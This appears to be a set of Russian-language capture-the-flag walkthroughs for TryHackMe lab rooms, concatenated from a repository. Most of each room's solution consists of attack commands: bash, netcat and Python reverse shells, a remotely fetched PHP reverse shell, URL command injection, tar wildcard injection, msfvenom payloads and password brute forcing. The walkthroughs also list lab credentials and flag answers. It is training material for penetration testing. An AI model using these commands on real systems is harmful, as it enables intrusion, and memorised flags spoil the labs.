``` 25 | Какая служба работает на портах 139 и 445? 26 | ```commandline 27 | smb 28 | ``` 29 | На компьютере пользователя есть общий ресурс. Как он называется? 30 | ```commandline 31 | smbclient -L 32 | ``` 33 | ```commandline 34 | pics 35 | ``` 36 | пользователь.txt 37 | ```commandline 38 | ftp 10.10.64.21 39 | ls -la 40 | cd scripts 41 | ls -la 42 | mget * 43 | y 44 | cat clean.sh 45 | cat removed_files.log 46 | cat to_do.txt 47 | 48 | vim clean.sh 49 | #!/bin/bash 50 | bash -i >& /dev/tcp//4444 0>&1 51 | nc -nlvp 4444 52 | ls 53 | cat user.txt 54 | ``` 55 | ```commandline 56 | 90d6f992585815ff991e68748c414740 57 | ``` 58 | корень.txt 59 | ```commandline 60 | crontab -l 61 | find / -user root -perm -u=s 2>/dev/null 62 | env /bin/sh -p 63 | cat /root/root.txt 64 | ``` 65 | ```commandline 66 | 4d930091c31a622a7ed10f27999af363 67 | ``` 68 | 69 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /02.Medium/Basic Malware RE.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [Basic Malware RE](https://tryhackme.com/r/room/basicmalwarere) 4 | 5 | Всего 4 задания: 6 | ## Задание 1 7 | Эти задачи направлены на изучение техники "Статического анализа", используемой для анализа вредоносного ПО. Основная 8 | цель этой комнаты - не использовать никакие типы отладчиков, а исполняемые файлы/программы не должны запускаться на 9 | какой-либо платформе. Вам необходимо ответить на все вопросы, даже не используя отладчик и даже не запуская 10 | исполняемые файлы/программы. 11 | 12 | Между тем, вся заслуга принадлежит @MalwareTechBlog за создание этих потрясающих испытаний. 13 | 14 | Примечание: Если вы уже решили эти задачи — попробуйте еще раз, уделив достаточно времени новичкам, которые хотят 15 | узнать об «Анализе вредоносных программ». Также не пытайтесь копировать и вставлять материал из других 16 | блогов/руководств, так как это не поможет вам изучить эту удивительную область. Если вам сложно решить эти задачи. 17 | Изучите их подробнее и о методах, которые в них задействованы. Тем временем вы также можете присоединиться к 18 | TryHackMe Discord и задать там свои проблемы. 19 | 20 | Пароль для ZIP-архива — MalwareTech . 21 | 22 | ### Ответьте на вопросы ниже 23 | Прочитайте вышеизложенное. 24 | ```commandline 25 | Ответ не нужен 26 | ``` 27 | 28 | ## Задание 2 29 | Этот исполняемый файл выводит MD5 Hash на экран при запуске. Можете ли вы получить точный флаг? 30 | 31 | Примечание: запускать исполняемый файл не нужно! 32 | 33 | ### Ответьте на вопросы ниже 34 | Какой флаг используется для генерации MD5? 35 | ```commandline 36 | strings strings1.exe_ 37 | ghidra 38 | # void entry(void) 39 | ``` 40 | ```commandline 41 | FLAG{CAN-I-MAKE-IT-ANYMORE-OBVIOUS} 42 | ``` 43 | 44 | ## Задание 3 45 | Этот исполняемый файл выводит MD5 Hash на экран при запуске. Можете ли вы получить точный флаг? 46 | 47 | Примечание: запускать исполняемый файл не нужно! 48 | ### Ответьте на вопросы ниже 49 | Какой флаг используется для генерации MD5? 50 | ```commandline 51 | chmod +x idafree83_linux.run 52 | ./idafree83_linux.run 53 | ``` 54 | ```commandline 55 | FLAG{STACK-STRINGS-ARE-BEST-STRINGS} 56 | ``` 57 | 58 | ## Задание 4 59 | Этот исполняемый файл выводит MD5 Hash на экран при запуске. Можете ли вы получить точный флаг? 60 | 61 | Примечание: запускать исполняемый файл не нужно! 62 | ### Ответьте на вопросы ниже 63 | Какой флаг используется для генерации MD5? 64 | ```commandline 65 | ghidra 66 | python3 67 | hex = 0x110 68 | print(int(0x110)) 69 | # ID 272 70 | ``` 71 | ```commandline 72 | FLAG{RESOURCES-ARE-POPULAR-FOR-MALWARE} 73 | ``` 74 | 75 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /02.Medium/Blog.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [Blog](https://tryhackme.com/r/room/blog) 4 | 5 | Всего 2 задания: 6 | ## Задание 1 7 | Билли Джоэл создал блог на своем домашнем компьютере и начал над ним работать. Это будет так здорово! 8 | 9 | Перечислите этот ящик и найдите 2 флага, которые в нем спрятаны! У Билли на ноутбуке происходят какие-то странные 10 | вещи. Сможете ли вы маневрировать и получить то, что вам нужно? Или вы упадете в кроличью нору... 11 | 12 | Чтобы блог работал с AWS, вам необходимо добавить MACHINE_IP blog.thm в файл `/etc/hosts`. 13 | 14 | Спасибо Sq00ky за идею root privesc ;) 15 | 16 | ### Ответьте на вопросы ниже 17 | корень.txt 18 | ```commandline 19 | nmap -sC -sV 20 | smbclient -L // 21 | smbclient -L ///BillySMB 22 | get Alice-White-Rabbit.jpg 23 | get tswift.mp4 24 | get check-this.png 25 | exit 26 | steghide extract -sf Alice-White-Rabbit.jpg 27 | cat rabbit_hole.txt 28 | zbarimg -q --raw check-this.png 29 | 30 | vim /etc/hosts 31 | blog.thm 10.10.10.32 32 | 33 | wpscan --url http://blog.thm --enumerate u 34 | wpscan -U users.txt -P /usr/share/wordlists/rockyou.txt --url http://blog.thm 35 | # kwheel / cutiepie1 36 | searchsploit wordpress 5.0.0 37 | 38 | msfconsole -q 39 | use exploit/multi/http/wp_crop_rce 40 | show options 41 | set rhost blog.thm 42 | set username kwheel 43 | set password cutiepie1 44 | exploit 45 | shell 46 | SHELL=/bin/bash script -q /dev/null 47 | find / -type f -user root -perm -u=s 2>/dev/null 48 | file /usr/sbin/checker 49 | ltrace /usr/sbin/checker 50 | export admin=1 51 | ``` 52 | ```commandline 53 | 9a0b2b618bef9bfa7ac28c1353d9f318 54 | ``` 55 | пользователь.txt 56 | ```commandline 57 | find / -type f -name user.txt 2>/dev/null 58 | cat /media/usb/user.txt 59 | ``` 60 | ```commandline 61 | c8421899aae571f7af486492b71a8ab7 62 | ``` 63 | Где был найден user.txt? 64 | ```commandline 65 | /media/usb 66 | ``` 67 | Какую CMS использовал Билли? 68 | ```commandline 69 | Wordpress 70 | ``` 71 | Какая версия вышеуказанной CMS использовалась? 72 | ```commandline 73 | 5.0 74 | ``` 75 | 76 | ## Задание 2 77 | #### Ответьте на вопросы ниже 78 | Поздравляю! 79 | ```commandline 80 | Ответ не нужен 81 | ``` 82 | 83 | 84 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /02.Medium/Boiler CTF.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [Boiler CTF](https://tryhackme.com/r/room/boilerctf2) 4 | 5 | Всего 2 задания: 6 | ## Задание 1 7 | Средний уровень CTF. Просто перечислите, и вы попадете туда. 8 | 9 | ### Ответьте на вопросы ниже 10 | Расширение файла после анонимного входа 11 | ```commandline 12 | nmap -sC -sV 13 | ftp 14 | ls -la 15 | get .info.txt 16 | file .info.txt 17 | cat .info.txt 18 | ``` 19 | ```commandline 20 | txt 21 | ``` 22 | Что находится на самом высоком порту? 23 | ```commandline 24 | ssh 25 | ``` 26 | Что работает на порту 10000? 27 | ```commandline 28 | http://:10000/ 29 | ``` 30 | ```commandline 31 | webmin 32 | ``` 33 | Можете ли вы использовать службу, работающую на этом порту? (ответ «да/нет») 34 | ```commandline 35 | nay 36 | ``` 37 | К какой CMS вы можете получить доступ? 38 | ```commandline 39 | gobuster dir -u http:// -w /data/src/wordlists/directory-list-2.3-medium.txt 40 | ``` 41 | ```commandline 42 | joomla 43 | ``` 44 | Продолжайте перечислять, и вы поймете, когда найдете. 45 | ```commandline 46 | gobuster dir -u http:///joomla/ -w /data/src/wordlists/directory-list-2.3-medium.txt 47 | ``` 48 | ```commandline 49 | Ответ не нужен 50 | ``` 51 | Интересное название файла в папке? 52 | ```commandline 53 | http:///joomla/_test/index.php&plot=;ls -l 54 | http:///joomla/_test/index.php&plot=;cat log.txt 55 | 56 | username: basterd 57 | password: superduperp@$$ 58 | ``` 59 | ```commandline 60 | log.txt 61 | ``` 62 | 63 | ## Задание 2 64 | Вы можете выполнить это вручную, но делайте это по своему усмотрению. 65 | 66 | ### Ответьте на вопросы ниже 67 | Где хранились пароли других пользователей (без расширения, только имя)? 68 | ```commandline 69 | ssh basterd@ 70 | /bin/bash 71 | sudo -l 72 | cd basterd/ 73 | ls -la 74 | cat backup.sh 75 | stoner : superduperp@$$no1knows 76 | ``` 77 | ```commandline 78 | backup 79 | ``` 80 | пользователь.txt 81 | ```commandline 82 | su - stoner 83 | whoami 84 | ls -la 85 | cat .secret 86 | ``` 87 | ```commandline 88 | You made it till here, well done. 89 | ``` 90 | Что вы использовали, чтобы получить статус привилегированного пользователя? 91 | ```commandline 92 | sudo -l 93 | find / -user root -perm -4000 -executable -type f 2>/dev/null 94 | ``` 95 | ```commandline 96 | find 97 | ``` 98 | корень.txt 99 | ```commandline 100 | find /root -exec ls /root \; 101 | find /root -exec cat /root/root.txt \; 102 | ``` 103 | ```commandline 104 | It wasn't that hard, was it? 105 | ``` 106 | 107 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /02.Medium/Bookstore.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [Bookstore](https://tryhackme.com/r/room/bookstoreoc) 4 | 5 | Всего 1 заданиe: 6 | ## Задание 1 7 | Bookstore — это машина boot2root CTF, которая обучает начинающего тестировщика на проникновение основам перечисления 8 | веб-сайтов и фаззингу REST API. При перечислении сервисов можно найти несколько подсказок, идея в том, чтобы понять, 9 | как можно эксплуатировать уязвимый API, вы можете связаться со мной в Twitter @siddhantc_, чтобы дать любые отзывы 10 | относительно машины. 11 | 12 | ### Ответьте на вопросы ниже 13 | Пользовательский флаг 14 | ```commandline 15 | nmap -sSCV 16 | gobuster dir -u http:// -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 17 | gobuster dir -u http://:5000 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 18 | ffuf -u "http://:5000/api/v1/resources/books?FUZZ=1" -w /usr/share/wordlists/dirb/small.txt 19 | http://:5000/api/v1/resources/books?show=1 20 | http://:5000/api/v1/resources/books?show=/etc/passwd 21 | http://:5000/api/v1/resources/books?show=/home/sid/user.txt 22 | http://:5000/api/v1/resources/books?show=./bash_history 23 | ``` 24 | ```commandline 25 | 4ea65eb80ed441adb68246ddf7b964ab 26 | ``` 27 | Корневой флаг 28 | ```commandline 29 | nc -nlvp 4444 30 | 31 | import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]); 32 | ./try-harder 33 | cat /root/root.txt 34 | ``` 35 | ```commandline 36 | e29b05fba5b2a7e69c24a450893158e3 37 | ``` 38 | 39 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /02.Medium/CMesS.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [CMesS](https://tryhackme.com/r/room/cmess) 4 | 5 | Всего 1 заданиe: 6 | ## Задание 1 7 | Пожалуйста, добавьте MACHINE_IP cmess.thmв /etc/hosts 8 | 9 | Обратите внимание, что этот ящик не требует грубой силы! 10 | 11 | ### Ответьте на вопросы ниже 12 | + 30 13 | Скомпрометируйте эту машину и получите user.txt 14 | ```commandline 15 | nmap -sSCV 16 | curl -s /robots.txt 17 | 18 | vim /etc/hosts 19 | cmess.thm 20 | 21 | /data/src/dirsearch/dirsearch.py -u http://cmess.thm/ -E -w /data/src/wordlists/directory-list-2.3-medium.txt 22 | wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://cmess.thm" -H "Host: FUZZ.cmess.thm" --hw 290 23 | 24 | vim /etc/hosts 25 | cmess.thm 26 | dev.cmess.thm 27 | 28 | curl -s dev.cmess.thm | html2text 29 | 30 | URL: http://cmess.thm/admin/ 31 | Email: andre@cmess.thm 32 | Password: KPFTN_f2yxe% 33 | 34 | shell.php 35 | nc -nlvp 4444 36 | cat /opt/.password.bak 37 | ssh andre@ 38 | andre:UQfsdCB7aAP6 39 | cat user.txt 40 | ``` 41 | ```commandline 42 | thm{c529b5d5d6ab6b430b7eb1903b2b5e1b} 43 | ``` 44 | + 50 45 | Повысьте свои привилегии и получите root.txt 46 | ```commandline 47 | cat > /home/andre/backup/rev << EOF 48 | #!/bin/bash 49 | rm /tmp/f 50 | mkfifo /tmp/f 51 | cat /tmp/f|/bin/sh -i 2>&1|nc 4444 >/tmp/f 52 | EOF 53 | 54 | 55 | echo "" > "/home/andre/backup/--checkpoint=1" 56 | echo "" > "/home/andre/backup/--checkpoint-action=exec=sh rev" 57 | nc -nlvp 4444 58 | cat /root/root.txt 59 | ``` 60 | ```commandline 61 | thm{9f85b7fdeb2cf96985bf5761a93546a2} 62 | ``` 63 | 64 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /02.Medium/Classic Passwd.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [Classic Passwd](https://tryhackme.com/r/room/classicpasswd) 4 | 5 | Всего 1 заданиe: 6 | ## Задание 1 7 | Я забыл свой пароль, можете ли вы дать мне доступ к программе? 8 | ### Ответьте на вопросы ниже 9 | Что такое флаг? 10 | ```commandline 11 | file Challenge.Challenge 12 | strings Challenge.Challenge 13 | ./Challenge.Challenge 14 | ltrace ./Challenge.Challenge 15 | 16 | ./Challenge.Challenge 17 | Username: AGB6js5d9dkG7 18 | ``` 19 | ```commandline 20 | THM{65235128496} 21 | ``` 22 | 23 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /02.Medium/ConvertMyVideo.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [ConvertMyVideo](https://tryhackme.com/r/room/convertmyvideo) 4 | 5 | Всего 1 заданиe: 6 | ## Задание 1 7 | Вы можете конвертировать свои видео — почему бы вам не проверить это? 8 | 9 | ### Ответьте на вопросы ниже 10 | Как называется секретная папка? 11 | ```commandline 12 | nmap -sC -sV -A 13 | gobuster dir -u -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt 14 | curl -s http:/// 15 | curl http:///js/main.js 16 | ``` 17 | ```commandline 18 | admin 19 | ``` 20 | Какой пользователь имеет доступ к секретной папке? 21 | ```commandline 22 | yt_url=`wget${IFS}http://:4444/php-reverse-shell.phtml 23 | cd /var/www/html/admin/ 24 | ll 25 | cat .htpasswd 26 | # itsmeadmin:$apr1$tbcm2uwv$UP1ylvgp4.zLKxWj8mc6y/ 27 | john hash 28 | # jessie (itsmeadmin) 29 | ``` 30 | ```commandline 31 | itsmeadmin 32 | ``` 33 | Что такое флаг пользователя? 34 | ```commandline 35 | cat flag.txt 36 | ``` 37 | ```commandline 38 | flag{0d8486a0c0c42503bb60ac77f4046ed7} 39 | ``` 40 | + 50 41 | Что такое корневой флаг? 42 | + 43 | ```commandline 44 | SHELL=/bin/bash script -q /dev/null 45 | cat /var/www/html/admin/index.php 46 | cat /var/www/html/tmp/clean.sh 47 | echo "bash -i >& /dev/tcp//5555 0>&1" > clean.sh 48 | nc -nvlp 5555 49 | cat /root/root.txt 50 | ``` 51 | ```commandline 52 | flag{d9b368018e912b541a4eb68399c5e94a} 53 | ``` 54 | 55 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /02.Medium/CyberCrafted.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [CyberCrafted](https://tryhackme.com/r/room/cybercrafted) 4 | 5 | Всего 3 задания: 6 | ## Задание 1 7 | Подключитесь к сети TryHackMe и разверните машину. Если вы не знаете, как подключиться к VPN, пожалуйста, заполните 8 | комнату OpenVPN или используйте AttackBox, нажав кнопку Start AttackBox. 9 | 10 | Обратите внимание, что загрузка этой машины может занять пару минут. Я бы рекомендовал дать ей не менее пяти минут. 11 | 12 | ### Ответьте на вопросы ниже 13 | Готово.. Приготовьтесь... 14 | ```commandline 15 | Go 16 | ``` 17 | 18 | ## Задание 2 19 | ы нашли IP-адрес сервера Minecraft, находящегося в разработке. Можете ли вы получить root- доступ? 20 | 21 | ### Ответьте на вопросы ниже 22 | Сколько портов открыто? 23 | ```commandline 24 | nmap -T5 25 | dirsearch -u 26 | echo ‘ cybercrafted.thm’ >> /etc/hosts 27 | dirsearch -u http://admin.cybercrafted.thm/ 28 | dirsearch -u http://store.cybercrafted.thm/ 29 | sqlmap -r req.req --dbms=mysql -D webapp -T admin –dump 30 | id 31 | rm f;mkfifo f;cat f|/bin/sh -i 2>&1|nc 4444 > f 32 | scp id_rsa root@:/root/trytohackme/cybercraft/ 33 | ssh2john id_rsa > id_rsa.hash 34 | john id_rsa.hash -wordlist=/usr/share/wordlists/rockyou.txt 35 | su cybercrafted 36 | sudo -l 37 | sudo /usr/bin/screen -r cybercrafted 38 | ``` 39 | ```commandline 40 | 3 41 | ``` 42 | Какая служба работает на самом высоком порту? 43 | ```commandline 44 | 45 | ``` 46 | ```commandline 47 | minecraft 48 | ``` 49 | Есть ли поддомены? (В алфавитном порядке) 50 | ```commandline 51 | admin store www 52 | ``` 53 | На какой странице вы нашли уязвимость? 54 | ```commandline 55 | search.php 56 | ``` 57 | Какое имя пользователя у администратора? (С учетом регистра) 58 | ```commandline 59 | xXUltimateCreeperXx 60 | ``` 61 | Что такое веб-флаг? 62 | ```commandline 63 | THM{bbe315906038c3a62d9b195001f75008} 64 | ``` 65 | Можете ли вы получить флаг сервера Minecraft? 66 | ```commandline 67 | THM{ba93767ae3db9f5b8399680040a0c99e} 68 | ``` 69 | Как называется этот сомнительный плагин? 70 | ```commandline 71 | LoginSystem 72 | ``` 73 | Какой флаг у пользователя? 74 | ```commandline 75 | THM{b4aa20aaf08f174473ab0325b24a45ca} 76 | ``` 77 | Заверши работу и дай мне корневой флаг! 78 | ```commandline 79 | THM{8bb1eda065ceefb5795a245568350a70} 80 | ``` 81 | 82 | ## Задание 3 83 | И вот вам! Это было « Cybercrafted » от madrinch . 84 | 85 | Подписывайтесь на меня в Twitter ! 86 | 87 | ### Ответьте на вопросы ниже 88 | Удачи в ваших будущих приключениях! 89 | ```commandline 90 | Ответ не нужен 91 | ``` 92 | 93 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /02.Medium/Gatekeeper.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [Gatekeeper](https://tryhackme.com/r/room/gatekeeper) 4 | 5 | Всего 2 задания: 6 | ## Задание 1 7 | Разверните машину, когда будете готовы освободить Gatekeeper. 8 | 9 | **Записи не принимаются для этого задания** 10 | 11 | ### Ответьте на вопросы ниже 12 | Ответ не требуется 13 | ```commandline 14 | Ответ не нужен 15 | ``` 16 | 17 | ## Задание 2 18 | Победите Привратника, чтобы разорвать цепи. Но будьте осторожны, на другой стороне вас ждет огонь. 19 | 20 | ### Ответьте на вопросы ниже 21 | Найдите и найдите флаг пользователя. 22 | ```commandline 23 | nmap -sSCV -p- 24 | nc 31337 25 | smbclient -L // 26 | smbclient -L \\\\\\Users 27 | cd Share 28 | dir 29 | get gatekeeper.exe 30 | /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 1000 -q 39654138 31 | !mona compare -f C:\mona\oscp\bytearray.bin -a 02AB19F8 32 | 33 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4444 EXITFUNC=thread -b “\x00\x0a” -f c 34 | msfconsole 35 | use exploit/multi/handler 36 | set LHOST 37 | set PAYLOAD windows/meterpreter/reverse_tcp 38 | run 39 | sysinfo 40 | ls 41 | cat user.txt.txt 42 | ``` 43 | ```commandline 44 | {H4lf_W4y_Th3r3} 45 | ``` 46 | Найдите и найдите корневой флаг 47 | ```commandline 48 | use post/multi/gather/firefox_creds 49 | options 50 | sessions 51 | set SESSION 1 52 | run 53 | ls 54 | 55 | sudo xfreerdp /u:mayor /p:8CL7O1N78MdrCIsV /cert:ignore /v: 56 | ``` 57 | ```commandline 58 | {Th3_M4y0r_C0ngr4tul4t3s_U} 59 | ``` 60 | 61 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /02.Medium/HaskHell.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [HaskHell](https://tryhackme.com/r/room/haskhell) 4 | 5 | Всего 1 заданиe: 6 | ## Задание 1 7 | Покажите своему профессору, что его докторская степень не находится под охраной. 8 | 9 | Пожалуйста, отправляйте комментарии/опасения/письма с ненавистью на адрес @passthehashbrwn в Twitter. 10 | 11 | ### Ответьте на вопросы ниже 12 | Получите флаг в файле user.txt. 13 | 14 | ```commandline 15 | sudo nmap -sSCV 16 | http://:5001/submit 17 | 18 | #!/usr/bin/env runhaskhell 19 | module Main where 20 | import System.Process 21 | main = callCommand "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 4444 >/tmp/f" 22 | 23 | 24 | nc -nlvp 4444 25 | whoami 26 | id 27 | ls -la /home 28 | cd /home/prof/.ssh/ 29 | ls -la 30 | which python3 31 | python3 -m http.server 32 | wget http://:8000/id_rsa 33 | 34 | chmod 600 id_rsa 35 | ssh -i id_rsa prof@ 36 | cat /home/prof/user.txt 37 | ``` 38 | ```commandline 39 | flag{academic_dishonesty} 40 | ``` 41 | Получите флаг в root.txt 42 | ```commandline 43 | SHELL=/bin/bash script -q /dev/null 44 | sudo -l 45 | ls -l /usr/bin/flask 46 | file /usr/bin/flask 47 | cat /usr/bin/flask 48 | python3 /usr/bin/flask 49 | 50 | 51 | cat > shell.py << EOF 52 | > #!/usr/bin/env python3 53 | > import pty 54 | > pty.spawn("/bin/bash") 55 | > EOF 56 | 57 | export FLASK_APP=shell.py 58 | sudo /usr/bin/flask run 59 | whoami 60 | cat /root/root.txt 61 | ``` 62 | 63 | ```commandline 64 | flag{im_purely_functional} 65 | ``` 66 | 67 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /02.Medium/Looking Glass.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [Looking Glass](https://tryhackme.com/r/room/lookingglass) 4 | 5 | Всего 1 заданиe: 6 | ## Задание 1 7 | Проберитесь сквозь Зеркало и захватите флаги. 8 | ### Ответьте на вопросы ниже 9 | Получите флаг пользователя. 10 | ```commandline 11 | nmap -sSCV -p- 12 | for i in $(seq 9800 111111); do echo "connecting to port $i"; ssh -o 'LogLevel=ERROR' -o 'StrictHostKeyChecking=no' -p $i test@;done | grep -vE 'Lower|Higher' 13 | # jabberwocky 14 | CyberChef > thealphabetcipher 15 | jabberwock:bewareTheJabberwock 16 | 17 | ssh jabberwock@ -p 22 18 | jabberwock:bewareTheJabberwock 19 | cat uxer.txt 20 | # reverse 21 | ``` 22 | ```commandline 23 | thm{65d3710e9d75d5f346d2bac669119a23} 24 | ``` 25 | + 100 26 | Получите корневой флаг. 27 | ```commandline 28 | sudo -l 29 | cat /etc/crontab 30 | 31 | vim twasBrillig.sh 32 | sh -i >& /dev/tcp//4444 0>&1 33 | 34 | nc -nlvp 4444 35 | ls -la 36 | cat humptydumpty.txt 37 | # SHA256 38 | su humptydumpty 39 | cat poetry.txt 40 | cp /home/alice/.ssh/id_rsa /home/humptydumpty 41 | chmod 600 id_rsa 42 | ssh alice@ -i id_rsa 43 | bash -i >& /dev/tcp//5555 0>&1 44 | pwncat --listen --port 5555 45 | chmod +x lse.sh 46 | ./lse.sh -l 1 | tee lse.txt 47 | sudo -h ssalg-gnikool -l -l 48 | sudo -h ssalg-gnikool /bin/bash 49 | cat /root/root.txt 50 | ``` 51 | ```commandline 52 | thm{bc2337b6f97d057b01da718ced6ead3f} 53 | ``` 54 | 55 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /02.Medium/Mindgames.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [Mindgames](https://tryhackme.com/r/room/mindgames) 4 | 5 | Всего 1 заданиe: 6 | ## Задание 1 7 | Никаких подсказок. Взломайте. Не сдавайтесь, если застрянете, перечислите сложнее 8 | 9 | ### Ответьте на вопросы ниже 10 | Пользовательский флаг. 11 | ```commandline 12 | nmap -sSCV 13 | curl -s http:// 14 | import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("my_own_IP",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]); 15 | nc -nlvp 4444 16 | curl -d "+++++ +++++ [REDACTED] ++ ++<]> ++.<" -X POST http:///api/bf 17 | cat /home/user.txt 18 | ``` 19 | ```commandline 20 | thm{411f7d38247ff441ce4e134b459b6268} 21 | ``` 22 | + 50 23 | Корневой флаг. 24 | + 25 | ```commandline 26 | cat server.service 27 | gcc -fPIC -o rootshell.o -c rootshell.c 28 | gcc -shared -o rootshell.so -lcrypto rootshell.o 29 | chmod +x rootshell.so 30 | openssl req -engine ./rootshell.so 31 | cat /root/root.txt 32 | ``` 33 | ```commandline 34 | thm{1974a617cc84c5b51411c283544ee254} 35 | ``` 36 | 37 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /02.Medium/Nax.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [Nax](https://tryhackme.com/r/room/nax) 4 | 5 | Всего 1 заданиe: 6 | ## Задание 1 7 | Сможете ли вы выполнить задание? 8 | Загрузка и настройка машины может занять до 5 минут. 9 | Примечание : для этой комнаты требуется Metasploit 6. 10 | 11 | ### Ответьте на вопросы ниже 12 | Какой скрытый файл вы нашли? 13 | ```commandline 14 | nmap -sSCV 15 | gobuster dir -u http://:80/ -w /path-to-wordlist -x txt,php,html 16 | curl -s http:// 17 | python3 -c "print(''.join([chr(i) for i in [47, 80, 73, 51, 84, 46, 80, 78, 103]]))" 18 | ``` 19 | ```commandline 20 | PI3T.Png 21 | ``` 22 | Кто является создателем файла? 23 | ```commandline 24 | exiftool PI3T.PNg 25 | ``` 26 | ```commandline 27 | Piet Mondrian 28 | ``` 29 | Если при запуске инструмента на загруженном изображении возникает ошибка, связанная с неизвестным форматом ppm, 30 | откройте его с помощью GIMP или другой программы для рисования, экспортируйте в формат ppm и повторите попытку! 31 | ```commandline 32 | Ответ не нужен 33 | ``` 34 | Какое имя пользователя вы нашли? 35 | ```commandline 36 | ./npiet /data/tmp/files/PI3T.ppm 37 | ``` 38 | ```commandline 39 | nagiosadmin 40 | ``` 41 | Какой пароль вы нашли? 42 | ```commandline 43 | n3p3UQ&9BjLp4$7uhWdY 44 | ``` 45 | Какой номер CVE для этой уязвимости? Он будет в формате: CVE-0000-0000 46 | ```commandline 47 | searchsploit ngios XI -w 48 | ``` 49 | ```commandline 50 | CVE-2019-15949 51 | ``` 52 | Теперь, когда мы нашли нашу уязвимость, давайте найдем наш эксплойт. Для этой части комнаты мы будем использовать 53 | модуль Metasploit, связанный с этим эксплойтом. Давайте продолжим и запустим Metasploit с помощью команды `msfconsole`. 54 | ```commandline 55 | msfconsole 56 | search ngios XI 57 | use 8 58 | show options 59 | set LHOST AttackerIP 60 | set RHOST MachineIP 61 | set PASSWORD PW 62 | run 63 | shell 64 | cat user.txt 65 | cat root.txt 66 | ``` 67 | ```commandline 68 | Ответ не нужен 69 | ``` 70 | После запуска Metasploit давайте найдем наш целевой эксплойт с помощью команды 'search applicationame'. Каков полный 71 | путь (начиная с explore) для модуля эксплуатации? 72 | ```commandline 73 | exploit/linux/http/nagios_xi_plugins_check_plugin_authenticated_rce 74 | ``` 75 | Взломайте машину и найдите user.txt 76 | ```commandline 77 | THM{84b17add1d72a9f2e99c33bc568ae0f1} 78 | ``` 79 | Найдите root.txt 80 | ```commandline 81 | THM{c89b2e39c83067503a6508b21ed6e962} 82 | ``` 83 | 84 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /02.Medium/Oh My WebServer.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [Oh My WebServer](https://tryhackme.com/r/room/ohmyweb) 4 | 5 | Всего 1 заданиe: 6 | ## Задание 1 7 | Задействуйте машину, прикрепленную к этой задаче, и счастливого взлома! 8 | 9 | ### Ответьте на вопросы ниже 10 | Что такое флаг пользователя? 11 | ```commandline 12 | nmap -sSCV 13 | 